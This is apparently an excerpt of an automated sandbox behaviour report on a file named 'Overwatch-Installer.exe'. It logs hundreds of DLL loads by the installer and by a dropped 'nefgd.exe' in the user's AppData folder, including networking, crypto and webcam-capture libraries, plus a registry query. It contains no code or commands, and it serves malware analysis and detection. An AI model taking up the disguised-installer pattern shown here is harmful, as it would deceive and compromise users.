Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Overwatch-Installer.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: security.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: mmdevapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: ksuser.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: avrt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: audioses.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: midimap.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nefgd\nefgd.exe	Section loaded: dciman32.dll	Jump to behavior

Source: C:\Users\user\Desktop\Overwatch-Installer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\Overwatch-Installer.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\Overwatch-Installer.exe

